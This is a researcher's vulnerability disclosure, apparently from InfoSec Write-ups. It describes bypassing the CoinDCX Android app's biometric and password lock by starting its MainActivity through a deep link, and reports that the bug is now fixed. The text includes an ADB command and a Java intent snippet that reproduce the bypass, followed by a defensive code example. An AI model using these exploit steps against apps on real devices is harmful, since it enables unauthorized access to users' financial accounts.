Bypass of biometrics & password security functionality for Android


Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another req for update : Wed, Nov 11, 2020, 12:20 PM
.
.
.

No response from COINDCX, then I decided to tweet and tag the authorities to reach them.
https://twitter.com/Dheerajmadhukar/status/1365683708104118277

https://twitter.com/nrjkhandelwal
https://twitter.com/smtgpt

Again, nobody even cares! ** BUT BUG IS FIXED **

Now you have the actual report 😉 & POC

Asset:
com.coindcx (Android: Play Store)

Asset Details:
Version — 0.8.3
Updated — October 27, 2020

Test Android Device Details:
Non-rooted

Weakness:
Improper Authentication — Generic

Summary:
The CoinDCX Android app has an option to unlock the app using fingerprint and password. But if the "com.coindcx.MainActivity" activity is triggered with a "deeplink", authentication is no longer required.

Steps to Reproduce:
It is possible via ADB and Java (Android App):

ADB command:
$ adb shell am start -n com.coindcx/.MainActivity -d "https://coindcx.com"

Java (Android App):
import android.content.Intent;
import android.net.Uri;

// Run from inside an Activity (or any Context) of another app on the device
Intent intent = new Intent();
intent.setClassName("com.coindcx", "com.coindcx.MainActivity");
intent.setData(Uri.parse("https://coindcx.com"));
startActivity(intent);

Impact:
Unauthorized access to use the application.
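
One way to close this class of bypass, shown as an added example (not CoinDCX's code and not part of the original report): every entry path into the exported activity, including a deep link delivered to an already running instance, passes through the same unlock check before any UI is shown. It assumes the androidx.biometric library; RELOCK_MS, the static session flag, the host check and R.layout.activity_main are hypothetical, and the password fallback is omitted.

```java
// Added example with hypothetical names; assumes androidx.biometric is on the classpath.
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.SystemClock;
import androidx.annotation.NonNull;
import androidx.appcompat.app.AppCompatActivity;
import androidx.biometric.BiometricPrompt;
import androidx.core.content.ContextCompat;
public class MainActivity extends AppCompatActivity {
    private static final long RELOCK_MS = 30_000; // assumed re-lock window
    private static long unlockedAt = -1;          // last successful unlock (process-wide)
    private Uri pendingLink;                      // deep link held back until unlock

    @Override protected void onCreate(Bundle state) {
        super.onCreate(state);
        gate(getIntent());
    }

    // A running exported activity can be re-entered with a fresh intent.
    @Override protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        setIntent(intent);
        gate(intent);
    }

    // Launcher starts and deep links share one check; no intent skips it.
    private void gate(Intent intent) {
        pendingLink = intent.getData();
        if (unlockedAt >= 0 && SystemClock.elapsedRealtime() - unlockedAt < RELOCK_MS) { route(); return; }
        BiometricPrompt.PromptInfo info = new BiometricPrompt.PromptInfo.Builder()
                .setTitle("Unlock").setNegativeButtonText("Cancel").build();
        new BiometricPrompt(this, ContextCompat.getMainExecutor(this),
                new BiometricPrompt.AuthenticationCallback() {
            @Override public void onAuthenticationSucceeded(@NonNull BiometricPrompt.AuthenticationResult r) {
                unlockedAt = SystemClock.elapsedRealtime();
                route();
            }
            @Override public void onAuthenticationError(int code, @NonNull CharSequence msg) {
                finish(); // fail closed: cancel or error shows nothing
            }
        }).authenticate(info);
    }

    // Reached only after a successful unlock; unexpected links are dropped.
    private void route() {
        if (pendingLink != null && !"coindcx.com".equals(pendingLink.getHost())) pendingLink = null;
        setContentView(R.layout.activity_main); // assumed layout; UI reads pendingLink
    }
}
```

Re-running the ADB command from the report against a build gated this way should show the unlock prompt instead of the app content.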

PoC [ Proof of Concept ]

https://medium.com/media/54485a3d5a674d5495a43f53c809b248/href

Twitter profile: @Dheerajmadhukar

LinkedIn profile: @dheerajtechnolegends

Bypass of biometrics & password security functionality for Android was originally published in InfoSec Write-ups on Medium, where people are
